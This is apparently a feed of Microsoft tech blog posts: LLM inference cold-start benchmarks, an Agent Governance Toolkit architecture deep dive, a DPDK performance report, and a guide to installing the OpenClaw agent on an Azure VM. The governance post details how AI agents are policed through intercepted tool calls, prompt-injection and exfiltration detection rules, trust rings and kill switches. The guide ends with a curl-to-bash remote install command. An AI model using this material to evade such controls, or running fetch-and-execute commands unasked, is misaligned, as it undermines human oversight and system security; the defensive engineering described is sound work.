vLLM loads model weights, runs torch.compile, captures CUDA graphs for multiple batch shapes, allocates KV cache, and warms up, all before serving the first request. This takes ~176 seconds regardless of how fast the image arrived.

The breakdown makes the bottleneck obvious: the green bar (startup) is nearly constant across all four variants, swamping any pull-time differences.

Figure 1: vLLM cold-start breakdown. Startup (green, ~176s) dominates regardless of snapshotter.

Method	Pull	Startup	1st Inference	TTFT
overlayfs (gzip)	140.8s ±5.5	176.0s ±3.2	0.16s	317.2s ±2.2
overlayfs (uncomp.)	129.9s ±3.3	180.8s ±12.2	0.16s	310.9s ±8.9
EROFS (gzip)	158.9s ±8.8	175.3s ±0.8	0.16s	334.4s ±8.7
EROFS (uncomp.)	166.3s ±21.1	177.3s ±12.8	0.16s	343.8s ±8.2

Llama 3.1 8B, ~14 GB image, n=2–3 per variant. ± = sample standard deviation. Three of twelve runs hit intermittent NVIDIA container runtime crashes (exit code 120, unrelated to snapshotters) and were excluded. We excluded Nydus because FUSE-streaming the 14 GB Python/CUDA stack caused startup to exceed 900s. Note: the EROFS uncompressed pull time (166.3s ±21.1) is slower than EROFS gzip, with a standard deviation that swallows the effect — this cell is essentially noise at n=2. Steady-state inference: ~0.134s across all snapshotters.

44% pull, 56% startup. Dropping gzip saves 6 seconds of end-to-end TTFT on a 317-second cold start (1.02x). If your engine is vLLM, optimizing the pull pipeline is the wrong lever.

llama.cpp: pull dominates, compression is the bottleneck

llama.cpp has the opposite profile. Its C++ runtime starts in 2–5 seconds, so the pull becomes the majority of cold-start. This is where filesystem and compression choices actually matter.

Here the picture flips. Pull (blue) is the widest bar, and the gzip-to-uncompressed difference is visible at a glance:

Figure 2: llama.cpp cold-start breakdown. Pull time (blue) dominates for gzip variants.

Method	Pull	Startup	1st Inference	TTFT
overlayfs (gzip)	88.3s ±0.2	5.3s ±0.5	45.1s ±1.4	138.8s ±0.8
overlayfs (uncomp.)	56.3s ±3.1	2.0s ±0.0	44.2s ±0.1	102.4s ±3.1
EROFS (gzip)	92.0s ±2.3	6.1s ±0.5	44.0s ±0.2	142.3s ±1.9
EROFS (uncomp.)	58.8s ±0.6	2.0s ±0.0	44.0s ±0.1	104.8s ±0.5

Llama 3.1 8B Q4_K_M, 8.7 GB image uncompressed, n=3 per variant, 12/12 runs succeeded. First inference includes model weight loading into GPU VRAM (~43s) plus token generation (~1.5s). Steady-state inference: ~1.5s across all snapshotters.

64% pull, 4% startup, 33% model loading. Dropping gzip saves 36 seconds (1.35x) with zero infrastructure changes.

Engine comparison

Placed side by side, the two engines tell opposite stories about the same infrastructure:

Figure 3: Where cold-start time goes. vLLM is compute-bound; llama.cpp is pull-bound.

	vLLM	llama.cpp
Time saved by dropping gzip	6s (2% of TTFT)	36s (26% of TTFT)
Startup time	176–181s	2–5s
Speedup from dropping gzip	1.02x	1.35x

Same optimization, completely different impact. Before investing in pull optimization (compression changes, lazy-pull infrastructure, registry tuning), profile your engine’s startup. If startup dominates, the pull isn’t where the time goes.

Why gzip hurts: model weights are incompressible

The llama.cpp AIKit image is 8.7 GB uncompressed, 6.6 GB with gzip (a modest 0.76x ratio). But this ratio hides what’s really happening:

Layer type	Size	% of image	Gzip ratio
Model weights (GGUF)	4.9 GB	56%	~1.00x (quantized binary, no redundancy)
CUDA + system layers	~3.8 GB	44%	~0.46x (compresses well)

The GGUF file is already quantized to 4-bit precision. Gzip reads every byte, burns CPU, and produces output the same size as the input. You’re paying full decompression cost on 56% of the image for zero size reduction. (For vLLM’s larger 14 GB image, model weights are a smaller fraction and the compressible Python/CUDA stack dominates, which is why gzip’s overhead matters less there.)

Bottom line: gzip is doing real work on less than half your image and producing zero savings on the rest. Dropping it costs nothing and removes a bottleneck from every cold start.

The Nydus prefetch finding

If decompression is the bottleneck, what about skipping the full pull entirely?

Nydus lazy-pull takes a fundamentally different approach: it fetches only manifest metadata during “pull” (~0.7s), then streams model data on-demand via FUSE as the container reads it. Nydus TTFT isn’t directly comparable to the full-pull methods above because the download cost shifts from the pull column to the inference column.

With prefetch enabled, Nydus achieved 77.8s TTFT for llama.cpp. The critical detail is the prefetch_all flag — the difference between prefetch ON and OFF is 2.87x:

Figure 4: Nydus prefetch ON vs OFF. One config flag, 2.87x difference. Overlayfs baselines shown for context.

Configuration	1st Inference	TTFT
Nydus, prefetch ON	72.4s ±0.6	77.8s ±0.5
Nydus, prefetch OFF	218.6s ±2.9	223.4s ±2.9
overlayfs uncompressed (baseline)	44.0s ±0.1	102.4s ±3.1
overlayfs gzip	44.0s ±0.4	139.1s ±1.9

n=3 per config, 9/9 runs succeeded. Nydus and overlayfs gzip baselines are from a separate test run (03-prefetch-config-20260401-030725.csv); overlayfs uncompressed is from the main llama.cpp run. The overlayfs gzip baselines are within noise across runs (139.1s vs 138.8s).

One flag in nydusd-config.json, 2.87x difference (prefetch ON vs OFF). Without prefetch, every model weight page fault fires an individual HTTP range request to the registry. With prefetch_all=true, Nydus streams the full blob in the background while the container starts, so chunks arrive ahead of the GPU’s read pattern. Note that with prefetch enabled, Nydus is effectively performing a full pull overlapped with container startup rather than true on-demand fetching — the win comes from the overlap, not from fetching less data.

Compared to overlayfs uncompressed (the post’s recommended baseline), Nydus prefetch is 1.32x faster (77.8s vs 102.4s). Compared to overlayfs gzip, 1.79x.

Even with prefetch, Nydus first inference is ~28s slower than overlayfs (72s vs 44s) due to FUSE kernel-user roundtrips during model mmap. Nydus wins on total TTFT because it eliminates the blocking pull, but this overhead means its advantage shrinks on faster networks.

Bottom line: Nydus lazy-pull can halve cold-start for pull-bound engines, but only if prefetch is on. Treat prefetch_all=true as a hard requirement, not a tuning knob.

How to apply these findings

Pick your optimization by engine type

The right optimization depends on where your engine spends its cold-start time. This table summarizes the tradeoffs:

Engine type	Dominant phase	Speedup from dropping gzip	Nydus viable?	Best optimization	What NOT to optimize
vLLM / TensorRT-LLM	Startup (56%)	1.02x — negligible	No — FUSE + Python/CUDA stack exceeded 900s in our tests	Cache torch.compile artifacts and CUDA graphs	Pull pipeline (it’s <44% of TTFT and already fast enough)
llama.cpp / ONNX Runtime	Pull (64%)	1.35x — 36s saved	Yes, with prefetch_all=true (77.8s TTFT vs 102.4s uncompressed baseline)	Drop gzip on weight layers; consider lazy-pull on slow links	Startup (already 2–5s; no room to improve)
Large dense models (70B+)	Pull (projected)	>1.35x — scales with image size	Yes, strongest case for lazy-pull	Uncompressed or zstd; Nydus prefetch on bandwidth-constrained links	—

Recommendations

Profile your engine’s startup before touching the pull pipeline. If CUDA compilation dominates (vLLM, TensorRT-LLM), no amount of pull optimization will help. Cache torch.compile artifacts and CUDA graphs instead.
Drop gzip on model weight layers. For pull-bound engines (llama.cpp, ONNX Runtime), this is the single highest-ROI change: build with --output=type=image,compression=uncompressed, or use AIKit, which defaults to uncompressed weight layers. Quantized model weights (GGUF, safetensors) are already dense binary — gzip burns CPU for negligible size reduction.
If using Nydus, set prefetch_all=true. Without it, every weight page fault triggers an individual HTTP range request and cold-start is 2.87x slower. This is a single flag in nydusd-config.json.
Package models as signed OCI artifacts, not volume mounts. Three CNCF projects implement this pipeline end-to-end: ModelPack defines the OCI artifact spec (model metadata, architecture, quantization format). AIKit builds ModelPack-compliant images with Cosign signatures, SBOMs, and provenance attestations — supply chain guarantees you lose when weights live on a shared drive. KAITO handles the Kubernetes deployment: GPU node provisioning, inference engine setup, and API exposure. Together they cover packaging → build → deploy, and they produce the exact image layout these benchmarks measured.

Why this matters: the cost of cold-start

On an A100 node (~$3–4/hr on major clouds), a 5-minute vLLM cold start burns ~$0.30 in idle GPU time per pod. That sounds small until you multiply it: a cluster that scales 50 pods to zero overnight and restarts them each morning wastes ~$15/day — over $5,000/year — on GPUs sitting idle during pull and CUDA compilation. More critically, cold-start latency determines whether scale-to-zero is feasible at all. If cold-start exceeds your SLO (say, 30s for an interactive app), you’re forced to keep warm replicas running 24/7, which can 2–3x your GPU spend.

What this doesn’t cover

zstd compression: decompresses 5–10x faster than gzip; containerd supports it natively. The most obvious gap in this analysis.
Pre-pulling and caching: production clusters pre-pull images and can cache CUDA compilation artifacts, substantially reducing restart times. We measure the cold case: scale-from-zero events and first-time deployments.
Volume-mounted weights: skips the pull entirely, but loses supply chain properties (signing, scanning, provenance).
Larger models (70B+): pull would dominate more, increasing the gzip penalty.
Sample size: n=3 per AIKit variant, n=2–3 per vLLM variant. The gzip finding for llama.cpp is statistically significant (Welch’s t-test, p=0.0014, Cohen’s d=16.3; verification script). Other comparisons are directional.

Reproduce it

Scripts and raw data: erofs-repro-repo. Data for this post: 02-aikit-five-way-20260401-004716.csv and 01-vllm-four-way-20260331-113848.csv. Full analysis: technical report.

Agent Governance Toolkit: Architecture Deep Dive, Policy Engines, Trust, and SRE for AI Agents

mosiddi — Fri, 10 Apr 2026 04:55:22 GMT

Last week we announced the Agent Governance Toolkit on the Microsoft Open Source Blog, an open-source project that brings runtime security governance to autonomous AI agents. In that announcement, we covered the why: AI agents are making autonomous decisions in production, and the security patterns that kept systems safe for decades need to be applied to this new class of workload.

In this post, we'll go deeper into the how: the architecture, the implementation details, and what it takes to run governed agents in production.

The Problem: Production Infrastructure Meets Autonomous Agents

If you manage production infrastructure, you already know the playbook: least privilege, mandatory access controls, process isolation, audit logging, and circuit breakers for cascading failures. These patterns have kept production systems safe for decades.

Now imagine a new class of workload arriving on your infrastructure, AI agents that autonomously execute code, call APIs, read databases, and spawn sub-processes. They reason about what to do, select tools, and act in loops. And in many current deployments, they do all of this without the security controls you'd demand of any other production workload.

That gap is what led us to build the Agent Governance Toolkit: an open-source project, that applies proven security concepts from operating systems, service meshes, and SRE to the emerging world of autonomous AI agents.

To frame this in familiar terms: most AI agent frameworks today are like running every process as root, no access controls, no isolation, no audit trail. The Agent Governance Toolkit is the kernel, the service mesh, and the SRE platform for AI agents.

When an agent calls a tool, say, `DELETE FROM users WHERE created_at < NOW()`, there is typically no policy layer checking whether that action is within scope. There is no identity verification when one agent communicates with another. There is no resource limit preventing an agent from making 10,000 API calls in a minute. And there is no circuit breaker to contain cascading failures when things go wrong.

OWASP Agentic Security Initiative

In December 2025, OWASP published the Agentic AI Top 10: the first formal taxonomy of risks specific to autonomous AI agents. The list reads like a security engineer's nightmare: goal hijacking, tool misuse, identity abuse, memory poisoning, cascading failures, rogue agents, and more.

If you've ever hardened a production server, these risks will feel both familiar and urgent. The Agent Governance Toolkit is designed to help address all 10 of these risks through deterministic policy enforcement, cryptographic identity, execution isolation, and reliability engineering patterns.

Note: The OWASP Agentic Security Initiative has since adopted the ASI 2026 taxonomy (ASI01–ASI10). The toolkit's copilot-governance package now uses these identifiers with backward compatibility for the original AT numbering.

Architecture: Nine Packages, One Governance Stack

The toolkit is structured as a v3.0.0 Public Preview monorepo with nine independently installable packages:

Package	What It Does
Agent OS	Stateless policy engine, intercepts agent actions before execution with configurable pattern matching and semantic intent classification
Agent Mesh	Cryptographic identity (DIDs with Ed25519), Inter-Agent Trust Protocol (IATP), and trust-gated communication between agents
Agent Hypervisor	Execution rings inspired by CPU privilege levels, saga orchestration for multi-step transactions, and shared session management
Agent Runtime	Runtime supervision with kill switches, dynamic resource allocation, and execution lifecycle management
Agent SRE	SLOs, error budgets, circuit breakers, chaos engineering, and progressive delivery, production reliability practices adapted for AI agents
Agent Compliance	Automated governance verification with compliance grading and regulatory framework mapping (EU AI Act, NIST AI RMF, HIPAA, SOC 2)
Agent Lightning	Reinforcement learning training governance with policy-enforced runners and reward shaping
Agent Marketplace	Plugin lifecycle management with Ed25519 signing, trust-tiered capability gating, and SBOM generation
Integrations	20+ framework adapters for LangChain, CrewAI, AutoGen, Semantic Kernel, Google ADK, Microsoft Agent Framework, OpenAI Agents SDK, and more

Agent OS: The Policy Engine

Agent OS intercepts agent tool calls before they execute:

from agent_os import StatelessKernel, ExecutionContext, Policy

kernel = StatelessKernel()
ctx = ExecutionContext(
    agent_id="analyst-1",
    policies=[
        Policy.read_only(),                    # No write operations
        Policy.rate_limit(100, "1m"),          # Max 100 calls/minute
        Policy.require_approval(
            actions=["delete_*", "write_production_*"],
            min_approvals=2,
            approval_timeout_minutes=30,
        ),
    ],
)

result = await kernel.execute(
    action="delete_user_record",
    params={"user_id": 12345},
    context=ctx,
)

The policy engine works in two layers: configurable pattern matching (with sample rule sets for SQL injection, privilege escalation, and prompt injection that users customize for their environment) and a semantic intent classifier that helps detect dangerous goals regardless of phrasing. When an action is classified as `DESTRUCTIVE_DATA`, `DATA_EXFILTRATION`, or `PRIVILEGE_ESCALATION`, the engine blocks it, routes it for human approval, or downgrades the agent's trust level, depending on the configured policy.

Important: All policy rules, detection patterns, and sensitivity thresholds are externalized to YAML configuration files. The toolkit ships with sample configurations in `examples/policies/` that must be reviewed and customized before production deployment. No built-in rule set should be considered exhaustive. Policy languages supported: YAML, OPA Rego, and Cedar.

The kernel is stateless by design, each request carries its own context. This means you can deploy it behind a load balancer, as a sidecar container in Kubernetes, or in a serverless function, with no shared state to manage. On AKS or any Kubernetes cluster, it fits naturally into existing deployment patterns. Helm charts are available for agent-os, agent-mesh, and agent-sre.

Agent Mesh: Zero-Trust Identity for Agents

In service mesh architectures, services prove their identity via mTLS certificates before communicating. AgentMesh applies the same principle to AI agents using decentralized identifiers (DIDs) with Ed25519 cryptography and the Inter-Agent Trust Protocol (IATP):

from agentmesh import AgentIdentity, TrustBridge

identity = AgentIdentity.create(
    name="data-analyst",
    sponsor="alice@company.com",          # Human accountability
    capabilities=["read:data", "write:reports"],
)
# identity.did -> "did:mesh:data-analyst:a7f3b2..."

bridge = TrustBridge()
verification = await bridge.verify_peer(
    peer_id="did:mesh:other-agent",
    required_trust_score=700, # Must score >= 700/1000
)

A critical feature is trust decay: an agent's trust score decreases over time without positive signals. An agent trusted last week but silent since then gradually becomes untrusted, modeling the reality that trust requires ongoing demonstration, not a one-time grant.

Delegation chains enforce scope narrowing: a parent agent with read+write permissions can delegate only read access to a child agent, never escalate.

Agent Hypervisor: Execution Rings

CPU architectures use privilege rings (Ring 0 for kernel, Ring 3 for userspace) to isolate workloads. The Agent Hypervisor applies this model to AI agents:

Ring	Trust Level	Capabilities
Ring 0 (Kernel)	Score ≥ 900	Full system access, can modify policies
Ring 1 (Supervisor)	Score ≥ 700	Cross-agent coordination, elevated tool access
Ring 2 (User)	Score ≥ 400	Standard tool access within assigned scope
Ring 3 (Untrusted)	Score < 400	Read-only, sandboxed execution only

New and untrusted agents start in Ring 3 and earn their way up, exactly the principle of least privilege that production engineers apply to every other workload.

Each ring enforces per-agent resource limits: maximum execution time, memory caps, CPU throttling, and request rate limits. If a Ring 2 agent attempts a Ring 1 operation, it gets blocked, just like a userspace process trying to access kernel memory.

These ring definitions and their associated trust score thresholds are fully configurable via policy. Organizations can define custom ring structures, adjust the number of rings, set different trust score thresholds for transitions, and configure per-ring resource limits to match their security requirements.

The hypervisor also provides saga orchestration for multi-step operations. When an agent executes a sequence, draft email → send → update CRM, and the final step fails, compensating actions fire in reverse. Borrowed from distributed transaction patterns, this ensures multi-agent workflows maintain consistency even when individual steps fail.

Agent SRE: SLOs and Circuit Breakers for Agents

If you practice SRE, you measure services by SLOs and manage risk through error budgets. Agent SRE extends this to AI agents:

When an agent's safety SLI drops below 99 percent, meaning more than 1 percent of its actions violate policy, the system automatically restricts the agent's capabilities until it recovers. This is the same error-budget model that SRE teams use for production services, applied to agent behavior.

We also built nine chaos engineering fault injection templates: network delays, LLM provider failures, tool timeouts, trust score manipulation, memory corruption, and concurrent access races. Because the only way to know if your agent system is resilient is to break it intentionally.

Agent SRE integrates with your existing observability stack through adapters for Datadog, PagerDuty, Prometheus, OpenTelemetry, Langfuse, LangSmith, Arize, MLflow, and more. Message broker adapters support Kafka, Redis, NATS, Azure Service Bus, AWS SQS, and RabbitMQ.

Compliance and Observability

If your organization already maps to CIS Benchmarks, NIST AI RMF, or other frameworks for infrastructure compliance, the OWASP Agentic Top 10 is the equivalent standard for AI agent workloads. The toolkit's agent-compliance package provides automated governance grading against these frameworks.

The toolkit is framework-agnostic, with 20+ adapters that hook into each framework's native extension points, so adding governance to an existing agent is typically a few lines of configuration, not a rewrite.

The toolkit exports metrics to any OpenTelemetry-compatible platform, Prometheus, Grafana, Datadog, Arize, or Langfuse. If you're already running an observability stack for your infrastructure, agent governance metrics flow through the same pipeline.

Key metrics include: policy decisions per second, trust score distributions, ring transitions, SLO burn rates, circuit breaker state, and governance workflow latency.

Getting Started

# Install all packages
pip install agent-governance-toolkit[full]

# Or individual packages
pip install agent-os-kernel agent-mesh agent-sre

The toolkit is available across language ecosystems: Python, TypeScript (`@microsoft/agentmesh-sdk` on npm), Rust, Go, and .NET (`Microsoft.AgentGovernance` on NuGet).

Azure Integrations

While the toolkit is platform-agnostic, we've included integrations that help enable the fastest path to production, on Azure:

Azure Kubernetes Service (AKS): Deploy the policy engine as a sidecar container alongside your agents. Helm charts provide production-ready manifests for agent-os, agent-mesh, and agent-sre.

Azure AI Foundry Agent Service: Use the built-in middleware integration for agents deployed through Azure AI Foundry.

OpenClaw Sidecar: One compelling deployment scenario is running OpenClaw, the open-source autonomous agent, inside a container with the Agent Governance Toolkit deployed as a sidecar. This gives you policy enforcement, identity verification, and SLO monitoring over OpenClaw's autonomous operations. On Azure Kubernetes Service (AKS), the deployment is a standard pod with two containers: OpenClaw as the primary workload and the governance toolkit as the sidecar, communicating over localhost. We have a reference architecture and Helm chart available in the repository.

The same sidecar pattern works with any containerized agent, OpenClaw is a particularly compelling example because of the interest in autonomous agent safety.

Tutorials and Resources

34+ step-by-step tutorials covering policy engines, trust, compliance, MCP security, observability, and cross-platform SDK usage are available in the repository.

git clone https://github.com/microsoft/agent-governance-toolkit
cd agent-governance-toolkit
pip install -e "packages/agent-os[dev]" -e "packages/agent-mesh[dev]" -e "packages/agent-sre[dev]"

# Run the demo
python -m agent_os.demo

What's Next

AI agents are becoming autonomous decision-makers in production infrastructure, executing code, managing databases, and orchestrating services. The security patterns that kept production systems safe for decades, least privilege, mandatory access controls, process isolation, audit logging, are exactly what these new workloads need. We built them. They're open source.

We're building this in the open because agent security is too important for any single organization to solve alone:

Security research: Adversarial testing, red-team results, and vulnerability reports strengthen the toolkit for everyone.
Community contributions: Framework adapters, detection rules, and compliance mappings from the community expand coverage across ecosystems.

We are committed to open governance. We're releasing this project under Microsoft today, and we aspire to move it into a foundation home, such as the AI and Data Foundation (AAIF), where it can benefit from cross-industry stewardship. We're actively engaging with foundation partners on this path.

The Agent Governance Toolkit is open source under the MIT license. Contributions welcome at github.com/microsoft/agent-governance-toolkit.

DPDK 25.11 Performance on Azure for High-Speed Packet Workloads

KashanK — Wed, 01 Apr 2026 18:37:04 GMT

At Microsoft Azure, performance is treated as an ongoing discipline grounded in careful engineering and real-world validation. As cloud workloads grow in scale and variety, customers depend on consistent, high-throughput networking. Technologies such as the Data Plane Development Kit (DPDK) play a key role in meeting these expectations

To support customers running advanced network functions, we’ve released our latest performance report based on DPDK 25.11. It is now available in the DPDK performance catalog (Microsoft Azure DPDK Performance Report). The report provides a clear view of how DPDK performs on Microsoft-developed Azure Boost within Azure infrastructure, with detailed insights into packet processing across a range of scenarios, from small packet sizes to multi-core scaling.

Why We Test DPDK on Azure

DPDK is widely used for high-performance packet processing in virtualized environments. It powers a range of workloads from customer-deployed virtual network functions to internal Azure network appliances.

But simply enabling DPDK is not enough. To ensure optimal performance, we validate it under realistic conditions, including:

Azure VM configurations with Accelerated Networking
NUMA-aware memory and CPU alignment
Hugepage-backed memory allocation
Multi-core PMD thread scaling
Packet forwarding using real traffic generators

This helps us understand how DPDK performs in actual cloud environments, not just idealized lab setups.

What the Report Covers

The DPDK 25.11 report includes performance benchmarks across different frame sizes, ranging from 64 bytes to 1518 bytes. It also evaluates CPU usage, queue configuration, and latency stability across various test conditions.

Key Report Highlights:

Line-rate throughput is achievable at common frame sizes when vCPUs are pinned correctly and memory is properly configured
Low jitter and consistent latency are observed across multi-queue and multi-core tests
Performance scales nearly linearly with additional cores, especially for smaller packet sizes
Queue and PMD thread alignment with the NUMA layout plays a critical role in maximizing efficiency

All tests were performed using Azure VM SKUs equipped with Microsoft NICs and configured for optimal isolation and performance.

Why We Shared This with the Community

Publishing this report reflects our commitment to open engineering and ecosystem collaboration. We believe performance transparency benefits everyone in the ecosystem, including developers, operators, and customers.

Here are a few reasons why we share:

It helps customers plan and tune their workloads using validated performance envelopes
It enables vendors and contributors to optimize drivers, firmware, and applications based on real-world data
It encourages reproducibility and standardization in cloud DPDK benchmarking
It creates a feedback loop between Azure, the DPDK community, and our partners

Our goal is not just to test internally but to foster open dialogue and measurable improvement across platforms.

Recommendations for Running DPDK on Azure

Based on the test results, we offer the following best practices for customers deploying DPDK-based applications:

Area	Recommendation
VM Selection	Choose Accelerated Networking-enabled SKUs like D, Fsv2, or Eav4
CPU Pinning	Use dedicated cores for PMD threads and align with NUMA topology
Memory	Configure hugepages and allocate memory from the local NUMA node
Queue Mapping	Match RX and TX queues to available vCPUs to avoid contention
Packet Generator	Use pktgen-dpdk or testpmd with controlled traffic profiles

These settings can significantly improve consistency and peak throughput across many DPDK scenarios.

Get Involved and Reproduce the Results

We invite you to read the full report and try the configurations in your own environment. Whether you are running a firewall, a router, or a telemetry appliance, DPDK on Azure offers scalable performance with the right tuning.

You can:

Download the report at Microsoft Azure DPDK Performance Report
Replicate the test setup using Azure VMs and your preferred packet generator github.com/mcgov/dpdk-perf
Share your feedback with us through GitHub or community channels or send feedback dpdk@microsoft.com
Suggest improvements or contribute new scenarios to future performance reports

Conclusion

DPDK is a powerful enabler of high-performance networking in the cloud. With this report, we aim to make Azure performance data open, useful, and actionable. It reflects our ongoing investment in validating and improving the underlying infrastructure that supports mission-critical workloads.

We thank the DPDK community for ongoing collaboration. We look forward to continued engagement as we scale performance transparency in cloud-native environments.

Run OpenClaw Agents on Azure Linux VMs (with Secure Defaults)

johnsonshi_msft — Sun, 22 Mar 2026 16:34:46 GMT

Many teams want an enterprise-ready personal AI assistant, but they need it on infrastructure they control, with security boundaries they can explain to IT. That is exactly where OpenClaw fits on Azure.

OpenClaw is a self-hosted, always-on personal agent runtime you run in your enterprise environment and Azure infrastructure. Instead of relying only on a hosted chat app from a third-party provider, you can deploy, operate, and experiment with an agent on an Azure Linux VM you control — using your existing GitHub Copilot licenses, Azure OpenAI deployments, or API plans from OpenAI, Anthropic Claude, Google Gemini, and other model providers you already subscribe to. Once deployed on Azure, you can interact with an OpenClaw agent through familiar channels like Microsoft Teams, Slack, Telegram, WhatsApp, and many more!

For Azure users, this gives you a practical middle ground: modern personal-agent workflows on familiar Azure infrastructure.

What is OpenClaw, and how is it different from ChatGPT/Claude/chat apps?

OpenClaw is a self-hosted personal agent runtime that can be hosted on Azure compute infrastructure.

How it differs:

ChatGPT/Claude apps are primarily hosted chat experiences tied to one provider's models
OpenClaw is an always-on runtime you operate yourself, backed by your choice of model provider — GitHub Copilot, Azure OpenAI, OpenAI, Anthropic Claude, Google Gemini, and others
OpenClaw lets you keep the runtime boundary in your own Azure VM environment within your Azure enterprise subscription

In practice, OpenClaw is useful when you want a persistent assistant for operational and workflow tasks, with your own infrastructure as the control point. You bring whatever model provider and API plan you already have — OpenClaw connects to it.

Why Azure Linux VMs?

Azure Linux VMs are a strong fit because they provide:

A suitable host machine for the OpenClaw agent to run on
Enterprise-friendly infrastructure and identity workflows
Repeatable provisioning via the Azure CLI
Network hardening with NSG rules
Managed SSH access through Azure Bastion instead of public SSH exposure

How to Set Up OpenClaw on an Azure Linux VM

This guide sets up an Azure Linux VM, applies NSG (Network Security Group) hardening, configures Azure Bastion for managed SSH access, and installs an always-on OpenClaw agent within the VM that you can interact with through various messaging channels.

What you'll do

Create Azure networking (VNet, subnets, NSG) and compute resources with the Azure CLI
Apply Network Security Group rules so VM SSH is allowed only from Azure Bastion
Use Azure Bastion for SSH access (no public IP on the VM)
Install OpenClaw on the Azure VM
Verify OpenClaw installation and configuration on the VM

What you need

An Azure subscription with permission to create compute and network resources
Azure CLI installed (install steps)
An SSH key pair (the guide covers generating one if needed)
~20–30 minutes

Configure deployment

Step 1: Sign in to Azure CLI

az login # Select a suitable Azure subscription during Azure login az extension add -n ssh # SSH extension is required for Azure Bastion SSH

The ssh extension is required for Azure Bastion native SSH tunneling.

Step 2: Register required resource providers (one-time)

az provider register --namespace Microsoft.Compute az provider register --namespace Microsoft.Network

Verify registration. Wait until both show Registered.

az provider show --namespace Microsoft.Compute --query registrationState -o tsv az provider show --namespace Microsoft.Network --query registrationState -o tsv

Step 3: Set deployment variables

Set the deployment environment variables that will be needed throughout this guide.

RG="rg-openclaw" LOCATION="westus2" VNET_NAME="vnet-openclaw" VNET_PREFIX="10.40.0.0/16" VM_SUBNET_NAME="snet-openclaw-vm" VM_SUBNET_PREFIX="10.40.2.0/24" BASTION_SUBNET_PREFIX="10.40.1.0/26" NSG_NAME="nsg-openclaw-vm" VM_NAME="vm-openclaw" ADMIN_USERNAME="openclaw" BASTION_NAME="bas-openclaw" BASTION_PIP_NAME="pip-openclaw-bastion"

Adjust names and CIDR ranges to fit your environment. The Bastion subnet must be at least /26.

Step 4: Select SSH key

Use your existing public key if you have one:

SSH_PUB_KEY="$(cat ~/.ssh/id_ed25519.pub)"

If you don't have an SSH key yet, generate one:

ssh-keygen -t ed25519 -a 100 -f ~/.ssh/id_ed25519 -C "you@example.com" SSH_PUB_KEY="$(cat ~/.ssh/id_ed25519.pub)"

Step 5: Select VM size and OS disk size

VM_SIZE="Standard_B2as_v2" OS_DISK_SIZE_GB=64

Choose a VM size and OS disk size available in your subscription and region:

Start smaller for light usage and scale up later
Use more vCPU/RAM/disk for heavier automation, more channels, or larger model/tool workloads
If a VM size is unavailable in your region or subscription quota, pick the closest available SKU

List VM sizes available in your target region:

az vm list-skus --location "${LOCATION}" --resource-type virtualMachines -o table

Check your current vCPU and disk usage/quota:

az vm list-usage --location "${LOCATION}" -o table

Deploy Azure resources

Step 1: Create the resource group

The Azure resource group will contain all of the Azure resources that the OpenClaw agent needs.

az group create -n "${RG}" -l "${LOCATION}"

Step 2: Create the network security group

Create the NSG and add rules so only the Bastion subnet can SSH into the VM.

az network nsg create \ -g "${RG}" -n "${NSG_NAME}" -l "${LOCATION}" # Allow SSH from the Bastion subnet only az network nsg rule create \ -g "${RG}" --nsg-name "${NSG_NAME}" \ -n AllowSshFromBastionSubnet --priority 100 \ --access Allow --direction Inbound --protocol Tcp \ --source-address-prefixes "${BASTION_SUBNET_PREFIX}" \ --destination-port-ranges 22 # Deny SSH from the public internet az network nsg rule create \ -g "${RG}" --nsg-name "${NSG_NAME}" \ -n DenyInternetSsh --priority 110 \ --access Deny --direction Inbound --protocol Tcp \ --source-address-prefixes Internet \ --destination-port-ranges 22 # Deny SSH from other VNet sources az network nsg rule create \ -g "${RG}" --nsg-name "${NSG_NAME}" \ -n DenyVnetSsh --priority 120 \ --access Deny --direction Inbound --protocol Tcp \ --source-address-prefixes VirtualNetwork \ --destination-port-ranges 22

The rules are evaluated by priority (lowest number first): Bastion traffic is allowed at 100, then all other SSH is blocked at 110 and 120.

Step 3: Create the virtual network and subnets

Create the VNet with the VM subnet (NSG attached), then add the Bastion subnet.

az network vnet create \ -g "${RG}" -n "${VNET_NAME}" -l "${LOCATION}" \ --address-prefixes "${VNET_PREFIX}" \ --subnet-name "${VM_SUBNET_NAME}" \ --subnet-prefixes "${VM_SUBNET_PREFIX}" # Attach the NSG to the VM subnet az network vnet subnet update \ -g "${RG}" --vnet-name "${VNET_NAME}" \ -n "${VM_SUBNET_NAME}" --nsg "${NSG_NAME}" # AzureBastionSubnet — name is required by Azure az network vnet subnet create \ -g "${RG}" --vnet-name "${VNET_NAME}" \ -n AzureBastionSubnet \ --address-prefixes "${BASTION_SUBNET_PREFIX}"

Step 4: Create the Virtual Machine

Create the VM with no public IP. SSH access for OpenClaw configuration will be exclusively through Azure Bastion.

az vm create \ -g "${RG}" -n "${VM_NAME}" -l "${LOCATION}" \ --image "Canonical:ubuntu-24_04-lts:server:latest" \ --size "${VM_SIZE}" \ --os-disk-size-gb "${OS_DISK_SIZE_GB}" \ --storage-sku StandardSSD_LRS \ --admin-username "${ADMIN_USERNAME}" \ --ssh-key-values "${SSH_PUB_KEY}" \ --vnet-name "${VNET_NAME}" \ --subnet "${VM_SUBNET_NAME}" \ --public-ip-address "" \ --nsg ""

--public-ip-address "" prevents a public IP from being assigned.

--nsg "" skips creating a per-NIC NSG (the subnet-level NSG created earlier handles security).

Reproducibility: The command above uses latest for the Ubuntu image. To pin a specific version, list available versions and replace latest:

az vm image list \ --publisher Canonical --offer ubuntu-24_04-lts \ --sku server --all -o table

Step 5: Create Azure Bastion

Azure Bastion provides secure-managed SSH access to the VM without exposing a public IP.

Bastion Standard SKU with tunneling is required for CLI-based "az network bastion ssh" command.

az network public-ip create \ -g "${RG}" -n "${BASTION_PIP_NAME}" -l "${LOCATION}" \ --sku Standard --allocation-method Static az network bastion create \ -g "${RG}" -n "${BASTION_NAME}" -l "${LOCATION}" \ --vnet-name "${VNET_NAME}" \ --public-ip-address "${BASTION_PIP_NAME}" \ --sku Standard --enable-tunneling true

Bastion provisioning typically takes 5–10 minutes but can take up to 15–30 minutes in some regions.

Step 6: Verify Deployments

After all resources are deployed, your resource group should look like the following:

Install OpenClaw

Step 1: SSH into the VM through Azure Bastion

VM_ID="$(az vm show -g "${RG}" -n "${VM_NAME}" --query id -o tsv)" az network bastion ssh \ --name "${BASTION_NAME}" \ --resource-group "${RG}" \ --target-resource-id "${VM_ID}" \ --auth-type ssh-key \ --username "${ADMIN_USERNAME}" \ --ssh-key ~/.ssh/id_ed25519

Step 2: Install OpenClaw (in the Bastion SSH shell)

curl -fsSL https://openclaw.ai/install.sh | bash

